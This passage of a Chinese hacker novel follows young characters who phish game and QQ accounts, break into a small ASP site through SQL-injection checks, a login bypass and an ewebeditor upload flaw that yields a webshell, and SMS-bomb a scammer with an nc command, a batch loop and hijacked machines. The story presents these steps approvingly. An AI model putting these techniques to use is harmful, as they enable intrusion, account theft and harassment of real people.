第一个问题结束以后,危险漫步抛出了第二个问题:对昨晚的入侵有何感受。说完又反悔,转问林雨生今天和田依处得怎么样。

林雨生:“很不错啊。”

萧让笑,“有信心没有?”

林雨生不置可否:“嗯哼。”

危险漫步:“她昨天是怎么知道我们入侵她路由器的,打听出来了么?”

这个问题困扰危险漫步一天一夜,他完全没有头绪。危险漫步的败笔在于他的轻敌,或者说,拥有一定技术的他,把毫不相识的邻居当做了小白。

田依不是黑客,但也不是小白。她任职与三蓝公司,做的是财务一方面的工作。三蓝公司是古店最大的网络安全公司,他崛起非常快,两年前还名不见经传,田依在三蓝规模还小的时候就在里面工作了,开始同事间说安全、入侵、爆破等事情的时候她还没在意,认为理所当然,只是因为耳濡目染,掌握基本的技术和技巧。后来有次公司接了一个单子,一个女生造变态偷窥狂偷窥,对手就是利用网络技术窃取了该女子的隐私。

田依听说后,当即向同事学习,她对其他技术不感兴趣,安全防护类却向周围的人学了个遍。

危险漫步看见两个安卓设备,一个设备是田依自己使用的手机,另一个就是测雷专用的手机。一旦出现异常,该手机就会发出警报提醒。昨天田依给林雨生开门,开门劈头盖脸一句“都怪你,又输了”并不是白说,她忙着查看手机,以至于打输游戏。不过,她看到显示是路由器入侵后,接着打游戏了——一局没结束。

相对而言,路由器入侵翻阅到隐私板块需要时间,入侵就入侵吧,队友不能坑。

田依觉得好笑的是,该入侵者的IP和自己相差一位数——公寓统一装有宽带,IP的地址是相邻的。本想等打完再找邻居算账,没想到邻居主动找上门了,而且还是明显对自己有意思的学生。

田依放心了一些,还好不是变态跟踪狂。既便如此,入侵行为也不能让她所接受,本想还一个入侵,却找不到路,一头雾水中,林雨生又向她提出看电影的请求……

危险漫步一时语塞,不知该说什么。这个答案对他而言没什么坏处,对方总不是个女黑客,他无意与这个邻居为敌,但是对林雨生而言就不一样了,他喜欢她,开始,谁又会喜欢一个偷窥的追求方式呢?危险漫步不禁为林雨生捏了把汗。

人的思想多变,事情往往具有两面性,林雨生不管看上去再天真无邪,可是毕竟是和危险漫步入侵自己电脑的人。田依第二天请同事为自己做一个检测,看看自己是否有资料被对方窃取。

两个同事捣鼓半天,最后得出结论:没有。他们也很奇怪,田依的防御措施并不算完善,对方是手段又花样众多,为何只在简单看流量日子后就不再前进?两个同事百思不得其解,最后商量出一个似是而非的答案:入侵者那边发生了什么意外,导致入侵停止。

田依思忖一下,被动的意外不太可能,他们三人当时在屋里,网络正常。那么就是主动放弃了。为什么呢?前方是一条通畅无阻的道路,他们为什么转身而归呢?

后来田依问起,林雨生低头不语。田依再三追问,林雨生才抬起头,看着她说:“我主动放弃,是因为我真的喜欢你,我想正大光明地追你,要你的联系方式,社交账户,而不是靠肮脏的手段。因为我是,的的确确地喜欢你。”

多年后,田依想起站在自己面前懦弱的男生,那一刻瞳孔里勇敢的神色还是会为之感动,她像站在无尽的路中,看着他向自己伸手。他他一无所有,衣衫甚至褴褛,境遇也许还不如自己,他有的,只有瞬间爆发出的无谓的勇气。

但这并不能算是原谅的理由。田依强装作镇静,林雨生又把头低下去,曾经自己的勇气,却成了今天路上的绊脚石。脚边的易拉罐跟着自己走了一路,摩擦的声音很难听,他只是,想找些事做,打发这个尴尬的光景。林雨生很容易被旁人的倾向所感染,喜怒哀乐都写在脸上,所以当听见田依轻柔的声音时,笑容又一次溢满他白净的脸。

每个行为都可以被原谅,只要你不用谎言坦白。说完,田依轻轻吻了一下林雨生的脸颊。

林雨生涨红了脸,支支吾吾却什么话也没说出来。田依继续道:“电影还不错,有点眼光,不绝交了。”

林雨生:“我眼光向来很好,不如怎么能在茫茫人海中挑中你?”

田依咯咯咯的笑,“小嘴挺甜的么。”

“等我追到你,一地这样。”林雨生牵起田依的手,“我一定会这样牵起你的手,走遍大街小巷。”那一天,田依没有松手。

危险漫步又深深为自己的大意而难过,自己的技术还不够成熟,却早早学会了骄傲的坏毛病。

萧让猛地抬头,“我想起了一个问题,TY520,她的名字叫田依,那么TY指的就是她自己咯?”

林雨生点头:“不仅如此,960726.520,前一串是她的生日。她昨天不是说了么——哦你先进屋了。”

怎么会有这样的人啊!萧让无语透顶,“王者咸鱼,自恋狂,他这样是找不到男朋友的。”

萧让瘫倒在沙发上,脸上挂着似是而非的笑容。林雨生扔了一枕头,骂到:“呸,他很快就会有男朋友了。”

萧让笑,说林雨生的密码一定是LYS.520,所话说,不是一家人,不进一家门……

危险漫步把枕头移开,“好了,说正事,我们再来讨论一下,我刚刚说的第二个问题,对于昨天的行动,大家有什么看法。”

萧让从沙发上起身,危险漫步示意他坐下,“我知道你现在想问什么,等这个话题结束我们再讨论。先说对于昨天晚上的看法吧。”

这是一成功的行动。即便有再多的限制词加与其上,也不能否定这一点,既定目标已经完成,不留把柄。

越成功,危险漫步就越孤独。他未定好自己的目标,再防波堤上与哥哥告别后,他的世界已经看不见未来,沿着漆黑的路走,不知什么时候才能看见尽头。他像一头迷失方向的雄狮,横冲乱撞。

改变在于危险漫步遇见了楚虹,与楚虹的相处,让危险漫步知道安定为何物,于是在第一次行动后,也是第一次稍微释放自己的能力之后,危险漫步才发现自己深处一片空虚之中,他想要脱离这种空虚,却不知该何去何从。他想寄希望于另外两个人,希望他们可以给自己一些建议,生活不至于如此得无聊。

林雨生是还是一个快乐的脚本小子,工具成为他身下的骏马,有了它,他简直觉得自己无所不能。萧让的能力自然和林雨生不是一个量级,但是他与世无争的性格成了黑客之路的缺陷,做事缺乏东西,从小养尊处优的他说是不知人间疾苦是何物都不过分。

也许,现在谈未来还太早了,几股不安分的力量,也没有资格谈未来。危险漫步有些哀伤。

“我决定,我们,暂时的目标是学习,学习黑客技术。我自己继续啃渗透一块,你们的技术,自己清楚,各自提高即可。雨生,关于你,我有些话要说。

“你现在的技术薄弱,甚至说,你根本没有什么技术,正因如此,你要严格得要求你自己,不要抱有菜鸟自暴自弃的想法。

“有一群人,拿着大喇叭喊自己是黑客,他们的行为是破坏别人的计算器和电话系统,这些人并不是黑客,他们是社会的渣滓,因为这些人也有相当成功的技术,所以被众人划为广义黑客的范畴。真正的黑客把这些人称为骇客,英文cracker,而黑客的英文是hacker,两词相像,但差别显著。

“黑客守着黑客的底线,但是骇客没有底线,计算机犯罪对他们来说是家常便饭,他们又被称为黑帽,即英文Black Hat,起源因头戴黑帽子的人通常被视为恶棍或坏人,尤其在西方的电影中,反派角色多戴黑色的帽子。在计算机世界,Black Hat变成一种俚语,常用来育碧黑客、网络入侵、计算机病毒等阴谋诡计。

“技术是一方面,但是我们必须守住道德底线。不管是做人,还是做事,都要有底线,不能无限制地突破道德和行业对你的最低要求。哪怕我们拥有卓越非凡的技术和天赋,但是如果突破来这一底线,那么人们记住的将不是我们的才能,而是我们的行为。

“人们对黑客与骇客误会颇深。其实黑客是很瞧不起骇客的,因为多数骇客的技术并不怎么样,他们多依赖工具,做出极其不负责任的行为。黑客与骇客的根本区别在于,黑客搞建设,骇客搞破坏。黑客促进互联网的发展,骇客妨碍互联网的发展。

“有人认为自1988年莫里斯把蠕虫投入互联网起,所谓的黑客精神便不复存在了。其实也不需要如此消极,中国黑客发展基本是自95年才开始。我们要做好本质工作就可以,其他的纷扰,我们不必去趟水。

“与黑帽相对的有白帽,他们被称为道德黑客,再这两者界限中,还有灰帽。

“成为一名黑客很难,有些人为之奋斗了数十年,也不敢承认。路走得是否平坦是成为黑客的关键。刚才我所说的工具,就是你道路上必然会出现的东西。当你是新手的时候,工具必不可缺,但是当你过分依赖于工具,那么工具就会成为你的绊脚石,你失去了学习的能力,只要工具能解决,就用工具,而不去思考,不去探索。成长的第一步,就是学习基础的知识,如从C语言编程学起。

“第二点,毅力。没有毅力的人做任何事都无法成功。成功的公式可以写成天赋×毅力。如果没有倍于常人的天赋,那么还是老实坚持。这里的毅力不是单纯的“忍”,不是蹲马步蹲了一天就有毅力了。他包括学习的刻苦程度,是否经得起诱惑等等。如你上网查一个资料,结果网页跳出一则黄网的广告,你能否经得起这个诱惑,也是你毅力的一步分。

“第三条,游戏。善待你与游戏的关系。很多老黑客坚持认为游戏是阻碍年轻黑客发展的一大拦路虎,其实不然,网络游戏的本质就是游戏,它是日常消遣的一部分,那么这种消遣真的可以成为前进路上的一大障碍么?

“是也不是。我看见很多青年沦为电子游戏的奴仆,他们在生活中不思进取,只愿在游戏中与对手一较高低。只要不沉迷于游戏中,那么游戏完全可以成为一种放松的消遣工具,为什么不呢?有的人玩游戏还玩出了花样,老萧就是,他玩极限狂飙,投入的资金并不大,但是号里的装备非常好,他分析游戏程序,做些必要的改动又不会妨碍游戏运行,他开中极品道具的几率就远远高于常人。”

林雨生看着萧让,他眯着眼,倒坐在椅子上。

危险漫步继续:“雨生,准备好么了?学习,使我们进步——老萧,你不要那么冷淡嘛,多少也要给点意见,以后雨生还得指望你多提携。”

萧让睁开眼睛,“我快要睡着了,你这套理论我早就听过了,我们快进入下个话题吧。”他冲了一杯咖啡,些许白色泡沫旋转着浮在最上层。

生活就好像一个玩笑。

危险漫步说完,萧让的杯子啪地摔在地上。


 第十七章  玩笑(二)


危险漫步从床上起来的时候,房间里静悄悄的没有动静。洗漱完毕,拿起插排的插头又放下,径直去了网吧。

如果危险漫步还有不稳定因素,那么汪青蓝的归来问题,和萧让内心的玩笑问题成了最大因素。

汪青蓝归来与否,一在与本人意愿,二在于危险漫步说服能力。其实算是一码事,正因为汪青蓝是危险漫步最好的朋友,所以危险漫步有种希望他能够走自己的路,而不是和他一起营建一个黑客团队。如果汪青蓝日后蹉跎,那么危险漫步才可以伸手邀请。

反观萧让内心的老友,这道刺就很严重了,如果没有这道疤痕,那么他与危险漫步就不会相遇。萧让的技术远低于危险漫步,却也是危险漫步唯一可靠的帮手,林雨生的水平还处于初级阶段,目前能帮的,也只有打杂类问题。

危险漫步一大清早去网吧的目的,就是为了萧让的老友,虽然没有十足的把握,但他还是要试一试。

想想自己,为了团队的两个伙伴,盗一次号,入侵一次路由器,真是黑历史……

危险漫步查询玩笑QQ125852439登陆流水,最后一次登陆是2007年1月8日,地址是池都。在网上翻,登陆的次数多集中在周末,或者中午晚上,地址都是湖城,看样子他的号并没有被盗,而且也没受到熊猫烧香的影响。

上网查看熊猫烧香爆发时间和地点,江海市在感染范围内,湖城却不在,这一点无疑验证了危险漫步的猜测。

看样子号被盗的可能性不大,那个叫玩笑的人,多半是出了意外。

不过,最后一次其他端登陆的时间是在2009年,地址湖城,登陆方式为天天跑车。

天天跑车是早期一款竞速类游戏,2004年登陆中国,一度风靡一时,随着网络游戏多样化,天天跑车的玩家逐渐减少。2008年极限狂飙上线,同为赛车竞速游戏的它更是挖走了天天跑车的大量玩家,天天跑车从此一蹶不振。

危险漫步推测,玩笑至少有一个朋友知道他的密码,并且在玩笑出事后登录过他的天天跑车账号玩游戏,如果知道上号的人是谁,那么盗取该QQ就轻而易举了。

网吧最方便的就是游戏不用下载,直接登陆。登陆天天跑车后,危险漫步查询125852439的游戏资料,昵称很显目:丿小手拉大手丶。危险漫步一阵狂汗,继续观察,看还能不能找到有用的信息。

危险漫步手拉了半天也没拉出个所以然来,准备退出的时候,发现这个游戏有个叫“部落”的东西,看起来似乎是一个团队,一查,才知道就是一个组织,谁都可以建立部落,一个部落最多可以有20个人,用来一起做任务,一起玩耍。

通过玩笑的号加入的部落,说不定可以摸索出线索。可是用对方的QQ只能查询出部落的一些基本信息,玩笑点击加入该部落,画面瞬间弹出一个“恭喜你,加入部落成功,赶快和部落的朋友的一起玩耍吧!”

这下部落的所有人的信息都可以看见了,不过遗憾的是,该部落除了危险漫步,最后一名成员最后一次登陆的时间在三个月前,倒数第二名成员登陆的时间为一年前……

这还玩耍,捉迷藏呢!危险漫步暗想,部落最底页有个信息栏,大致内容是为了部落更好的发展,请部落的成员们勤做任务……

又一阵狂汗中,危险漫步发现了一个很重要的东西:部落群。他毫不犹豫,申请加群。

危险漫步把空间做好伪装,进入他空间的人会直接跳转到另一个界面。危险漫步把该界面调整和空间一样,定好说说日子,把自己伪装为天天跑车的一个内部人员。危险漫步在群里坦白,自己是天天跑车的一个部门经理,进来游戏改造,第一步就是追回玩家,上面派给他的任务是收集活跃的部落资料,即需人员全部同时在线的部落的资料,为防止伪造,部落的首领不许踢掉老玩家。

危险漫步在群里抛出赏金2000,只要部落里的人可以同时在线。

刚才还没动静的群现在一下活跃起来,人们纷纷议论,聊天窗口迅速向上推动,危险漫步还没来得及细看,正准备向上翻,窗口弹出一则提示,一看,才知道自己被踢了。

妈的,一帮神经病,给钱都不要!危险漫步暗骂到,正思考下一步计划,右下方传来消息提示。

“你两千给我,我的部落里有十三个人,我的等会儿再拉几个人,保证同时在线?”

我靠,黑啊!危险漫步一阵狂汗,内心默默鄙视这个部落首长不地道。危险漫步说不可以踢部落里的老玩家,必须保证他们在线,部落里的空额可以招新人填补。

群主让危险漫步放心,部落里几个人的密码他都有。

危险漫步一时语塞,竟无言以对寻思这么黑的首长底下人竟然还死心塌地地把密码交给他。不过这样也好,对他来说,这样更轻松。

危险漫步给群主发一封邮件,提示他部落里的人同时在线后,截图发到这个邮箱里。

群主收到后,回了一个OK。

危险漫步窃喜,邮箱里除了文本还有一张合作愉快的图片,图片里隐藏代码,危险漫步连对方的电脑都懒得监控,直接用钓鱼工具把部落里20人的账户密码拿过来。

玩笑的QQ成功登陆,危险漫步转了2000过去之后就把群主拉入了黑名单。

有了QQ,对于了解某人来说便是事半功倍。危险漫步从两方面入手,一是从网上下几个付费工具,恢复该QQ号的聊天记录,能恢复多少恢复多少,另一方面,危险漫步进行各种角色扮演,从他的朋友里套出他的具体消息。

结果两个小时的努力,诸多问题终于浮出水面。

玩笑的本名迟宇森,他常挂在嘴边的话是生活就像一个玩笑。对他而言,确实如此。

以前做梦梦见坠落,或悬崖或高楼,最后在瞬间醒来,那种劫后余生的快感,在池宇森从百货大楼一跃而下后再未出现过。他听说人在死的时候会回顾自己的一生,可是,耳边的风呼啸不停,他的脑海里什么都没有,甚至没有必要的恐惧。

也许这就像自己的一生,除了一片虚无,就是一片虚无。

少年时的梦想,他用整个生命去追逐,却依然没得到任何人的支持。他把礼物做好后,托朋友带给已经分手的女友,随后结束了自己的生命。

他做的是两个人牵手的木雕,虽然在选题上很吃亏——太现代化,但依旧不能阻止它雕工的精美。

两个人牵手的地方有一个机关,触动机关后,男生另一只手臂里会弹出一张纸条,纸条大概类似于遗书吧,里面没有直接责怪他的女友,但是有很多,希望破灭的描写,在他的希冀里,他们可以好好走下去,他们可以做情侣做的任何事,只是因为理想,他在世人眼里成了一种不求上进的渣滓。

字里行间充斥着愤怒与抱怨。

时间过去两年,女友的家人硬闯进女儿的房间的时候,她已成为一具尸体,太多共同的朋友认为是池宇森害死了她,一如两年前,人们把她推入风尖浪口。

危险漫步把隐身改成在线,原想吓唬下萧让,把自己伪装成一个盗号者,计划进行一半,在病毒灭掉虚拟空间的时候,危险漫步又改变了主意。这个充斥着谎言的世界,不需要更多了谎言了。

“会议”在尴尬地沉默中结束,路由器荧绿的灯光在黑暗中闪烁几下即熄灭了,危险漫步扔掉插头,漆黑的房间直到天亮,再无一丝动静。


第十八章 预兆


萧让第一次玩极限狂飙是初中毕业的时候。中考完,他和另外两个人在街上撸完串,无事可做,老实回家似乎对不起难得的自由,三人商议完决定去网吧包夜。 

网吧门口禁止未成年人进入网吧的牌子和香烟盒上吸烟有害健康一样无用。拨开厚厚的门帘,呛人的烟味是网吧的特色。

江海市的网吧的格局,是和别处不同的:都是正对入口一个破旧脏兮兮的大柜台,柜台前杵着俩网管,看似可以随时为顾客服务。上网的人,进了网吧,每每花上3元,就可以一个小时的网,——这是好几年前的事了,现在每小时要涨到5元。倘肯多花十元,便可以包夜,如果出到二十元,那就可以成为会员,享受2元一个小时了。但是这些顾客,多是学生,大抵没有这样阔绰,只有大人,才打量柜台后面的饮料,充会员上网。

萧让这个人上网,是和别人不同的:都是慢条斯理地斗几把地主,刷几篇笑话,看有意思的新闻。如果玩累了呢,就打开网页,找一不电影,悠哉地看起来,——这是好几年前的事了,现在他已经学会玩游戏。

电影结束之后,夜还有很长。如果边上的朋友玩的不是极限狂飙的话,那么他的生命轨迹绝对会因此改变,但是命运从来就是这般离奇,它以诸多不可能的形式展现,一路可能下去。

萧让在游戏上并无过人的天赋,那一夜他只练了基础的技巧,漂移放气之类,随后进入新手房间和别人飙了几把车,输得体无完肤。

萧让在学校外租了房子,新电脑很空,软件都没有几个。他决定下载一款游戏以供日余消遣,但他又是个不玩网络游戏的人,想了想,决定还是下载几个月前在网吧玩的极限狂飙。当初和他去网吧的朋友转战DNF,萧让在极限狂飙里只有他一个人默默练车。不过也好,既然完全虚拟,那么不如虚拟得彻底一些。

两天后,萧让创建游戏房间,进来了一个ID叫番茄炒蛋的人,他说,车队招人。

以前萧让听朋友介绍过车队这个概念,一个车队由0级升到15级别,人数由50升到200,同在车队的玩家除了基本的任务、聊天外,还有专门的赛制是为车队而设立的。

先前朋友介绍的时候,萧让很是不屑,他只想做一个行者,一个人独行,自由自在,天马行空。可是当眼前这个人邀请自己的时候,萧让却毫不犹豫地答应加入他的车队。

这一定是个很厉害的战队。萧让想。查看车队的信息,才发现这不过不过是个0级小车队,建队的日期是昨天!

算了,既来之则安之。如果车队并不强大,那我就让他发展起来。萧让顺便加入一下车队群,进去之后很快有人问他游戏的ID是什么。

萧让说,是问我么?

对方说,是啊,毕竟群里只有我们两个人。

一阵狂汗,萧让觉得自己是上了贼船。聊天界面窗口弹来提示:你已成为本群的管理员。

……

更让他无语的是,他注意到群名称和游戏里车队名称都是“神京”。倚群主的意思,取自于柳永“杳杳神京盈盈仙子”,萧让语塞,回了一句神经。这次群主再没有回复,直到第三个人加入,群里一直静悄悄的。

贼船的发展比想象中迅速许多,国庆活动的时候,群主从某宝买号刷车队的积分,车队由0级一跃成为13级。另一方面,群主不断招兵买马,车队逐渐繁荣。

萧让入队时间早,又比较活跃,可以说是车队的元老骨干。不过纵然群主给了他所有的权限,但是他很少管理,他上游戏的时候,都是自己一个人练车,偶然任务也是自己一个人做。

萧让觉得和别人一起跑车是件很麻烦的事情,如果自己的技术高于别人,陌生人还好,认识的人就得等,这样每跑一局就会浪费一些时间。相反,如果别人的技术远高于萧让,他又不好意思让别人等他。

做任务也是同理,并且这个赛车游戏的任务多半是跑车。车队事无巨细几乎都由群主解决,激起斗志或者消磨耐心,都是一念之间的事。次年五一,车队繁荣达到顶峰,一整个夏天,车队活跃了好一阵子,随后逐渐走下坡路。当初因为各种因缘际会聚到一起的伙伴,也因为各种原因慢慢走散。

群主接触了另一款游戏,精力逐渐转移。萧让的性格,要玩就玩好,要么就不玩,所有他丝毫没有玩其他游戏的想法,更没有玩其他游戏的精力。

极限狂飙玩家普遍是中学生,或者刚刚升入大学的学生。好像萧让当初只是在网吧包夜无聊才玩的这个游戏一样,其他人也都是因一些原因选择它来消遣,最后,每个人各自应付各自的生活,相识到熟悉,到各自走散。

队里很多活跃玩家逐渐淡出极限狂飙,大家平日在一起谈天说地,互相有感情也不忍踢出车队,然而车队的名额是有限的,不活跃的玩家盘踞了相当的空间,车队逐渐没落下去。

到最后,车队活跃的玩家只剩萧让一人,偏偏他又是个不管事的人。车队的等级越高,在游戏中相应的福利越多,以萧让的活跃程度,他完全可以去一个满级的车队,三秋也常向萧让发出邀请,但是都被萧让拒绝了。

既来之则安之。自始至终,萧让都是这样的想法。虽然现在车队并不活跃,但至少有模有样,有时候突然落于山巅之上并不能带来满足,反倒是一步一个脚印,哪怕只走到山腰,也没有遗憾了。三秋本是队里的一个朋友,他是萧让认识的人中技术最高的,他的技术完全可以和线下比赛的专业选手媲美。萧让早知车队留不住他,也没有车队能留住他,三秋频繁换队,有时候自己创建一个,玩两天腻了又把车队甩给他人。

有一段时间,三秋与萧让的关系非常紧张——三秋去萧让的车队群拉人,这无疑触碰了萧让的底线。后来两个关系逐渐破冰,却也有了难以磨灭的隔阂。讽刺的是,早期和他一起玩的玩家都很少上线了,唯一活跃的人便是三秋。

得知玩笑早已离世的消息,萧让整个人有了很大变化,他做在电脑前,不思进取,依靠着并不有趣的游戏度日。

 一日,萧让收到一个提醒,好友三秋拉他进入一个群,群名字为Lighters。萧让没多想,点击同意。同意了老半天不见动静,萧让快把这事忘了的时候QQ才慢慢吞吞地弹出消息,Lighters的管理员同意你的申请。

萧让狂汗,原来这三秋不是管理员啊,那这是什么群,为什么要拉我。进去之后才知道这也是个车队群,三秋和他们的队长的关系,就好似三秋和萧让,是一种朋友而非队友的关系。三秋见萧让进来,在群里道:“欢迎道具大佛,老萧。”

极限狂飙玩家有个习惯,厉害的人,叫佛,竞速厉害的人叫竞速佛,舞蹈模式厉害的叫跳舞佛等等,其中道具佛意指开道具厉害的人,即能开到永久极品道具的人。极限狂飙主要装备是赛车、宠物、装扮——即衣服。赛车的等级依次为SABCD,S最好,D最差。S车只有充钱才能得到,而且要大把大把地砸才能得到永久,不然只能得个三五天。普通玩家对S车自然是望尘莫及,只能打A的主意。A车有很多,但是能用点券购买的只有一部分,而且只能买天数。其余要么绝版,要么得花钱买。有些点券道具可以开到永久的A车,不过那种概率低得像彩票一样,没魄力的人不敢浪费点券买道具。

萧让用点券的道具开中了6辆永久A,极品宠物、装扮不计其数,在自己队里算是有名气,与萧让关系很近的三秋自然知道这些,所有萧让一进来,就高呼他是“道具佛”。

承让承认,过奖过奖。

萧让和群里几个羡慕者假情假意地交流心得,混完脸熟后就把群屏蔽了。又不认识,没什么话聊。再者自己什么“道具佛”完全是徒有虚名,他之所以能开到一些不错的东西,完全是靠危险漫步帮他修改一些参数,提高概率,硬要说技巧,他还不如群里的人。萧让一副老道的样子,告诉群里人,开道具,没有技巧,只有恒心,只有毅力,不要放弃,总有一天会成功……

说完,自己都觉得虚伪。

后来一个百无聊赖的下午,萧让跑去Lighters群里做了一件自己最痛恨的事情——挖墙脚,一个人没挖着儿不说,还被群主发现了。场面一度十分尴尬,后来由于Lighters的队员们看不惯萧让到自家门口挖墙脚的作风,群而殴之,萧让寡不敌众,被骂个狗血淋头不说, 最后还被管理员踢出了群。

失败,真是失败。奇妙的是,被踢出群后,那个群的群主反倒跑来添加萧让为好友,两人聊了会儿天,话语投机,十分愉快,有点相见恨晚的感觉。


 第十九章 未来


林雨生盯紧眼前的电脑,心里有一丝紧张。近来的学习他进步很多,有些资料他看了就明白,可是当做到电脑前的时候,脑袋里又一片空白,什么也记不起了。

打开危险漫步交给他的网址。这个网站规模很小,使用的是ASP的动态页,Access数据库,林雨生的第一反应是检测注入情况,随便找了个链接,在网址后面分别添加“and 1=1”和“and 1=2”提交,结果返回了不同的页面,可以确定存在注入漏洞,于是他把网址放到ID中去进行检测,ID验证了是Access数据库,但是猜不出任何表段。换用其它的工具也是这样,林雨生一头雾水,思忖着下一步该怎么做。

注入可有可无,索性先找找后台——不能排除后台会有“'or'='or'”这样的经典登录漏洞。后台很容易就找,但是这个后台有些诡异,因为用户名和密码是输好了的,林雨生直接点击“登录”按钮后,返回了错误提示信息,查看文件源代码,发现这里输入好的用户名和密码都是admin。林雨生决定先不管这个奇怪的后台了又试了试试“'or'='or'”,但还是不行,根据社工的原理,林雨生试了试网页中的联系电话和邮箱等,皆没有成功。

一筹莫展之际,林雨生无意间看到了危险漫步以前的渗透笔记,其中曾提到了敏感文件的刺探,这里的敏感文件包括很多,比如robots.txt、readme.txt、说明.txt、licence.txt等等,想到这里他眼前不由一亮,拿起Jsky对网站进行检测,几秒钟过后,结果出来了,也检测到了SQL注入,在观察网站结构的时候,林雨生发现有1.asp和test.asp这两个奇怪的文件。

打开页面,里面凌乱的放置着代码、新闻数据、图片等,林雨生又顺便查看了一下图片的属性,结果却让人欣喜,因为网站还有ewebeditor。在浏览器中打开,出现了令人激动的下载提示,下载了ewebeditor的默认数据庠后将其打开,结果查找到了它的登录密码就是默认的admin。

接下来就是登录ewebeditor了,在浏览器中直接打开,本以为顺顺利利, 在这一关林雨生傻眼了——页面不存在。林雨生想,难道这个ewebeditor是让别人上当的陷阱吗?

Eweheditor也指望不上了,不然到它的后台,或许就能通过它得到Webshell。林雨生想,如果是利用test.asp呢?访问后林雨生一阵迷糊,感觉这像是帐号密码之类的东西,因为带有admin的字样。他将这个adminadmin513拆分开来尝试登录后台,当尝试到以admin作为登录名,以admin513作为密码登录时,成功的进入了后台。林雨生想,这个test.asp肯定是建设网站时做为测试用的,但后来忘了删除!

后台进入了,下一部是拿Webshell。刚发现的ewebeditor不知道能不能利用。后台选择“编辑器管理”一“样式管理”,接下来的操作就和以前利用ewebeditor一样,选择“standard”样式“管理”操作中的“拷贝”,就得到了“standardl”样式,点击“设置”,修改“standardl”的上传文件格式,使之能上传asp、asa、cer、cdx后缀的文件,都加上,然后点击“提交”。

下一步便是预览刚才修改过的“standardl”,点击图片上传按钮,选择从本地上传图片,林雨生上传了一个asa后缀的一句话asp木马。但不知是IE7的问题还是网站的ewebeditor有问题,上传后的上传窗口总是不消失也不提示上传是否成功,林雨生关闭了上传窗口后也不能进入代码编辑模式,这样就不能利用代码模式来查询上传文件的文件名,无奈,林雨生只好借助抓包工具Winsock Expert得到了上传文件名2010127195455248.asa。

木马已经上传成功了,图片上传存放的目录是“/admin/ewebeditor/UploadFile/”,所以应该使用一句话木马客户端来连接UploadFile/2010127195455248.asa”。

在SQL注入逐渐逝去的时代,依靠SQL漏洞来拿站已经变得越来越难了,。无论网站还是服务器都是由人制作管理的,在制作的时候很难面面俱到,总会疏忽大意,在入侵网站或服务器的时候是要与人斗,而不是与死的机器斗。只要有足够的细心,善于积累经验,就会抓住网站和服务器的任何一丝细节漏洞,最终成功。

写完感受,林雨生倚在椅子上,双手握拳伸了个懒腰。原计划今天再多实践几次,但是看着面前的显示器,林雨生异常的焦躁。人总是这样,有时候莫名奇妙的烦躁,来无影,请神容易送神难。

初夏的热气已经有所展露,林雨生穿着白色的长袖T恤,半倚靠着窗台,待会田依就要回来了,他想。

突然,手机一震,林雨生吓了一跳,一打量才发现是短信。林雨生懊恼地拍着头,看见短信内容,林雨生忍不住笑起来:

您好,您已经被抽中本期无敌幸运星活动的幸运用户,请补交个人所得税100元到工商银行623205************领取奖品。您的奖品代码为581269,详情请回拨136********。

低端手机诈骗已屡见不鲜,个人信息问题一次次被吹向风尖浪口,却总是得不到完满的解决。若在平常,林雨生会直接将短信删除,不再管它,今天他却冒出了一个邪恶的念头:报复一下这个骗子。

首先打开百度,搜索“短信验证”、“彩铃下载”。在搜索到的结果中找到一个可以发送手机验证消息的网站,并且不带验证码验证,找到符合要求的网站后,林雨生先用自己的号做了次实验,确认无误后,刷新刚才发短信的页面,打开抓包工具WSockExpert,然后点击WSockExpert工具栏中的“open”按钮,在新弹出的对话框中选择要监听的进程(不同的浏览器要选择不同的进程),然后点击进程左边的“+”号展开浏览器进程,在众多的标题中选择需要监听的网站标题,完成后单击右下角的“打开”按钮开始进行监听。

接下来返回到浏览器的短信发送页面,在输入框中输入想要攻击的电话号码——当然就是那个骗子的号码。单击“发送”按钮,网页弹出提示后,再返回查看WSockExpert工具窗口,就会看到截取到的数据了,在数据中找到“数据包内容”栏中“GET”开头的数据项,点击该数据项后就会在工具下方显示出该数据项的详细内容。复制数据项中的全部内容并保存到一个新建的txt文件中,比如保存为start.txt。

做到这里,林雨生皱起的眉头才舒展开来,他调出有网络瑞士军刀之称的NC,在系统的CMD下输入nc -w 3 www.u8u.com 80 <start.txt,意思就是每次延迟3秒向80端口提交start.txt里面的信息,回车执行后,对方就会收到短消息了。

不过,这样的轰炸确实会让对方头痛,但是林雨生这边一次次轰炸也很麻烦,此招属于杀敌一千,自损八百。为了以逸待劳,林雨生又编写了一个批处理,将批处理写入文本文件中,另存为bat格式然后运行,输入想要攻击的次数就会开始了。这里有一个值得注意的地方是,NC必须要和批处理存放在同一文件夹下。不过,发信息的快慢最终要由网速来决定,林雨生又挑了几台肉鸡同时发动,这样就能达到倍数效果。结果可想而知,骗子的手机不停地收到垃圾信息,终于也尝试了收到垃圾短信的滋味。

攻击结束之后,林雨生尝试给骗子打电话,结果却得知对方的手机已关机。

“乐什么呢?”

林雨生回过头,危险漫步正看着自己。林雨生把事情经过告诉他,危险漫步笑,“早就告诉过你,把手机防火墙打开,你不听,现在被垃圾短信盯上了吧。”

危险漫步要林雨生开手机防火墙确有其事,不过林雨生嫌麻烦,一直没有开。他这个习惯非常不好,凯文米特尼克的安全建议中,有一条就是使用个人防火墙以阻止其他计算机、网络、网址和计算机建立连接。现在手机发展迅速,智能机的出现又是一次质的飞跃,手机已由原来简单的通讯的初衷,变为一款手上计算机,它丰富的功能和各种数据,早已成为不法分子窥探的对象,然而手机用户却常会忽略手机的安全问题。

先说个古老些的,蓝牙。通过蓝牙,都有诸多非法软件,蓝牙间谍就是最著名的一款。

蓝牙间谍是一款真正的间谍软件。把它安装在手机里后,打开之,蓝牙间谍可以搜索附近手机是否打开蓝牙功能,若是被蓝牙间谍窥测见打开,那么他们的手机屏幕上就会出现是否接受蓝牙讯息的字样,如果选择是,那么这些人的手机就会自动开始拨打电话,这时候手机就可以轻松查看对方手机里的秘密了。

更恐怖的是,有些支持蓝牙的手机在接受到“蓝牙间谍”发送的连接请求时,无需机主确认就可以接通传输讯号。不使用塞班(symloian)操作系统的手机,在遭到病毒入侵后也会存在同样的问题,这个软件的危害性非常大。如果把个人资料、联系方式、银行账户、网游账号、QQ等信息储存在手机里,然后又中了蓝牙间谍的招,那么后果是非常严重的。

2010年注定被黑客们铭记——这一年智能手机开始成熟并且逐渐的普及起来。这一年iphone发布了IOS4,谷歌也接连发布了,Android2.1,2.2,2.3。这两个跨世纪的手机操作系统,可以说改变了生活,也改变了世界。同样的还是在这一年,第一个由手机黑客开发出来的Android恶意代码软件FakePlayer,横空出世。可以利用Android的root漏洞的代码Exploid在网络上被黑客公开。

